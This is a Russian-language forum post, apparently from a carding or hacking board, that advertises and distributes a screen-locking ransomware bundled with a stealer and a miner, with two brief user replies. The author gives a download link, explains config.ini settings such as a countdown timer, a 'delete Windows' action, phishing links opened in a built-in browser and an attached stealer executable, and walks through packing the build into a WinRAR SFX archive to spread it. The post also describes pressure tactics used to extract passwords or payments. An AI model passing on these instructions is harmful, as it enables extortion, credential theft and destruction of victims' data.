Создаём stealer без программ

lorensive98

Пользователь
Регистрация
30.03.20
Сообщения
1
Реакции
0
Приветствую, дорогой читатель. Наверняка ты хоть раз задумывался, как-же создать вирус без использования программ? И нет, я сейчас не говорю про простейшие .bat вирусы. Я говорю про мощнейшие трояны способные выкрасть любые пользовательские данные, даже если они не сохранены на носителе пользователя.

Представляю вам, WinLocker by lorensive98. И нет, это не имеет ничего общего с обычными баннерами, просто при первом взгляде на данное творение, у человека возникает именно такая ассоциация.

Самой главной отличительной чертой данного комбайна (stealer+winlocker+miner) является то, что для создания билда (итогового файла, который мы будем распостранять) совершенно не нужно открывать никаких сторонних программ (!). А это значит что билд можно сделать даже на Linux. И тут нет никакого подвоха.
Итак, нам понадабится:
• WinRAR (для работы с SFX-архивом)
• Любой текстовый редактор

Данный вымогатель блокирует систему (добавляется в автозагрузку, блокирует реестр, блокирует диспетчер задач естественно). В данном баннере можно установить таймер, по истечению которого применится одно из действий, например удаление Windows, разблокировка Windows или же ничего не делать (постоянно будет добавляться +10 минут, чтобы жертва теребилась, либо полная остановка таймера), но это не главное преимущество.

Ссылка на скачивание: https://2no.co/2uLmG5

Главная фишка - встроенный браузер, который выполняет все JavaScript сценарии на ПК, а это значит что с устройством можно выполнить любые манипуляции. Ссылки на которые будет заходить пользователь можно задать в config.ini, таким образом можно заставить человека написать логин/пароль от желаемой учётной записи, а это лучше чем стиллер, поскольку стиллер не может украсть пароли которые не сохранены. Также можно управлять компьютером через JavaScript-сценарии, хотя это вовсе и необязательно, ведь есть возможно добавить файл, который будет открываться при нажатии на кнопку получения информации и этим файлом может быть та же программа для управления компьютером.

Из-за того что WinLock иногда попадает в антивирусные базы, процент его открытия не такой большой как FUD, но процент выполнения заданий (например вписать свой логин/пароль от почты) огромный, более 93%. Секрет большого процента профита связан с высоким психологическим вовлечением пользователя. WinLocker выполнен в красных тонах, что усиленно действует на пользователя. Постоянно тикающий таймер снижает уровень критического мышления. А верно подобранное количество строк в известном формате 1+6 (1 заглавная строка и 6 дополнительных) добивают неподготовленного пользователя.

Ссылка на скачивание: https://2no.co/2uLmG5

Итак, сейчас я вам покажу как настроить данный WinLocker. (Внимание, если вы не хотите париться и не боитесь открывать программы, внутри архива есть WinLocker Builder с помощью которого можно сгенерировать config.ini. Удобный интерфейс, функция проверки ошибок, а также preview-mode с помощью которого можно просмотреть все изменения прямо на лету. Если вы используете Builder, пропускайте этот абзац, остальным приятного чтения)
Вся настройка заключается в редактировании файла config.ini.
Пример:
[texts]
line1=Вот эта первая строка
line2=А это вторая
line3=blablabla_penis_haha

Где [texts] - это ячейка
line3, line2, line1 - ключи
Знак = (равно) - обязательный знак
Знак [Enter] (перенос строки) - обязательный символ перед ключом
"blablabla_penis_haha", "А вот это вторая", "Вот это первая строка" - это значения. Значения - единственное что можно и нужно менять в файле config.ini. В значениях не рекомендуется использовать символы "!" и "=".

Настройка содержит две ячейки: [texts] и [settings]. Первая, технически, ни на что не влияет, её настройка предельно проста и я смогу её показать используя четыре рисунка (рис 1, рис 2, рис 3, рис 4).

screen1.png
Рис 1. config.ini

screen2.png
Рис 2. WinLocker Builder

screen3.png
Рис 3. WinLock1

screen4.png
Рис 4. WinLock2

Плюсы кастомизации текста заключаются в том, что с ним можно делать всё что угодно, хоть переводить на другие языки. С текстом разобрались. Теперь приступим к настройке [settings].

hour=% количество часов до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: hour=23

minute=% количество минут до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: minute=59

second=% количество секунд до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: second=59

afterend=% действие, после окончания таймера. Может принимать лишь пять видов значений: 0, 1, 2, 3, 4. Что значит каждая цифра:
0 - Перезагрузить ПК
1 - Удалить Windows
2 - Остановить таймер и ничего не делать
3 - Добавить 10 минут времени (бесконечно)
4 - Разблокировать Windows
Пример: afterend=0

code=% самый важный ключ - код разблокировки. Пример: code=1337unlockme1337

link%=% ссылка по которой перейдёт человек во встроенном браузере. Их всего три. Внимание! Не нужно писать http(s)://! Пишите сразу ссылку без http://! Пример: link2=t.me/lorensive98

stealer=%.exe любая ваша программа запускаемая при нажатии на кнопку в баннере, не обязательно стиллер, просто чаще всего используют именно его. Пример: stealer=miner.exe

Вот и подошла к концу настройка. Теперь осталось это всё положить в наш SFX-архив, для этого нам понадобится WinRAR. Заходим в папку WinLocker, для удобства ложем туда наш config.ini и stealer.exe и следуем инструкции:
1) Жмём правой кнопкой мыши по WinLocker.exe и жмём "Открыть в WinRAR"
2) Жмём на кнопку "Добавить"
screen5.png
3) Выбираем config.ini, и при желании наш дополнительный файл
screen6.png
4) Нажимаем "ОК" и готово ;)
screen7.png

Как использовать его решать вам. Можно создать google-форму где пользователю требуется ввести пароль, чтобы получить код и пользователь получит код на последней странице формы, а ссылку на google-форму указать в link1=%, или в качестве ссылки кинуть donate-страницу, где требуется зачислить вам пару сотен рублей. Решать вам, главное обеспечьте себя гибким средством для создания вирусов!

Ссылка на скачивание: https://2no.co/2uLmG5
Telegram для связи: L lorensive98
 
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна!
Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.

Hahol

Подозрительная личность. Работать только через гаранта!
VIP
Подтвержденный
Регистрация
15.02.14
Сообщения
29
Реакции
17
Депозит
0
Покупок
0
Продаж
0
Все гениальное- просто.
 

jubnf

Пользователь
Подтвержденный
Регистрация
23.12.14
Сообщения
3
Реакции
2
Депозит
0
Покупок
0
Продаж
0
пробовал кто?
сам в жир не вьеду если скачаю?
 
Сверху Снизу